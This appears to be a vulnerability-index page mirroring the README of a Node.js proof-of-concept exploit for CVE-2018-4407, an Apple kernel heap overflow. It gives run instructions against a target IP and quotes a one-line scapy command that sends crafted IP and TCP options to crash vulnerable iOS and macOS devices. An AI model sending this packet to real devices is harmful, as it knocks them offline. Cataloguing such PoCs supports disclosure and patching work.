CVE-2018-4407 PoC — 多款Apple产品 Kernel 缓冲区错误漏洞

Source

https://github.com/SamDecrock/node-cve-2018-4407

Associated Vulnerability

Title:多款Apple产品 Kernel 缓冲区错误漏洞 (CVE-2018-4407)
Description:A memory corruption issue was addressed with improved validation. This issue affected versions prior to iOS 12, macOS Mojave 10.14, tvOS 12, watchOS 5.

Description

Node.js PoC exploit code for CVE-2018-4407

Readme

# node-cve-2018-4407

Node.js PoC exploit code for CVE-2018-4407

Author: Sam Decrock

This script is based on the scapy script provided by Zuk:

<blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:<br>pip install scapy<br>sudo scapy <br>send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1&quot;*18),(19, “2”*18)]))</p>&mdash; Zuk (@ihackbanme) <a href="https://twitter.com/ihackbanme/status/1057811965945376768?ref_src=twsrc%5Etfw">November 1, 2018</a></blockquote>

It crashes devices with iOS 11 or earlier as well as some versions of OS X.


## Install modules

To install its required modules, run:

	npm install

## Run

To run, pass the target IP address as an argument:

	node attack.js 192.168.1.20

## More information

Original write-up by Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!